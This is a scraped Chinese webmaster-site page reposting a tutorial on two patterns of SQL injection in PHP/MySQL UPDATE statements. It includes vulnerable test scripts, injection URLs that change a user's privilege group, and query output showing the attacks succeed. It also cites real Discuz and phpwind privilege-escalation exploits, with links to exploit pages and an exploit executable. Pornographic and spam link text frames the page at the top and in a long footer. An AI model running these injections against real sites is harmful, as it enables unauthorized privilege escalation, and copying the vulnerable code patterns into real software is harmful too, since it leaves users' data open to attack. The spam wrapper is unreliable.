青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 安全教程 查看內容

UPDATE注射的兩個基本模式

2022-9-24 10:51| 查看: 2554 |來源: 互聯(lián)網(wǎng)

一.測試環(huán)境: OS: Windowsxp sp2 php: php 4.3.10 ( mysql 4.1.9 apache 1.3.33 二.測試數(shù)據(jù)庫結構: -----start--- -- 數(shù)據(jù)庫: `test` -- -- ----------------------------
一.測試環(huán)境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
二.測試數(shù)據(jù)庫結構:
-----start---
-- 數(shù)據(jù)庫: `test`
--
-- --------------------------------------------------------
--
-- 表的結構 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 導出表中的數(shù)據(jù) `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
------end-------
三.測試模式:
1,變量沒有帶’’或""[MOD1]
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權限等級,我們的目的就是通過構造$p 來達
到修改groupid的目的:
那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查詢:
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.01 sec)
用戶heige的groudid又2改為1了 :)
所以我們可以得到?jīng)]有’’或"" update的注射是可以成功的,這個就是我們的模式1。
2,變量帶’’或""[MOD2]
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "

SQL Query:$sql

";
?>
為了關閉’我們構造$p應該為123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了\’
提交的語句變成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
mysql查詢:
mysql> select * from userinfo;
--------- ------- --------------------
| groudid | user | pass |
--------- ------- --------------------
| 2 | heige | 123456’,groudid=’1 |
--------- ------- --------------------
1 row in set (0.00 sec)
groudid并沒有被修改。那么在變量被’’或""時 就完全沒有被注射呢?不是 下面我們看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫連接失敗");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的數(shù)據(jù)寫入數(shù)據(jù)庫
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我們測試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查詢下 :
mysql> select * from userinfo;
--------- ------- --------
| groudid | user | pass |
--------- ------- --------
| 1 | heige | 123456 |
--------- ------- --------
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid為1。 這個就是我們的模式2了,簡單的描敘如下:
update-->select-->update
四.實際模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 權限提升漏洞
漏洞分析:
update (profile.php 注射變量為$proicon update語句里為,icon=’$userdb[icon]’)
|
v
select (jop.php)
|
v
updtate (jop.php) Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

本文最后更新于 2022-9-24 10:51,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:[email protected]
·END·
站長網(wǎng)微信號:w17tui,關注站長、創(chuàng)業(yè)、關注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業(yè)用途,如果損害了您的權利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質的創(chuàng)業(yè)信息和品牌營銷服務,與站長一起進步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 欧美激情一区二区三区AA片 | 亚洲视频精品在线观看 | 大桥未久与黑人中出视频 | 18禁在线无遮挡羞羞漫画 | 好姑娘社区在线视频 | 亚洲一区二区三区免费看 | ZZoo兽2皇 | 中文字幕亚洲欧美日韩2019 | 亚洲免费网站在线观看 | 日本强好片久久久久久AAA | 把内衣脱了把奶露出来 | 宝贝你骚死哥了好爽 | 欧美精品成人久久网站 | 成人久久欧美日韩一区二区三区 | 男女生爽爽爽视频免费观看 | 日本漫画无彩翼漫画 | 免费啪视频观试看视频 | 青青草原影视 | 亚洲伊人久久网 | 国产a级午夜毛片 | 国产亚洲精品线视频在线 | 亚洲网站视频在线观看 | 3d无遮挡h肉动漫在线播放 | 狠狠狠色丁香婷婷综合久久 | 色欲天天天综合网免费 | 欧美日韩国产码在线 | 国产99视频精品一区 | 干性感美女 | 亚洲高清国产拍精品影院 | 国精一区二区AV在线观看网站 | 啦啦啦 中文 日本 韩国 免费 | 裸妇厨房风流在线观看 | 强奷漂亮女老板在线播放 | 国产亚洲精品A久久777777 | 无码专区无码专区视频网网址 | 国内视频在线精品一区 | 涩涩免费网站 | 嘟嘟嘟影院免费观看视频 | 九九热这里只有精品2 | 色噜噜视频影院 | 麻豆官网md.pub |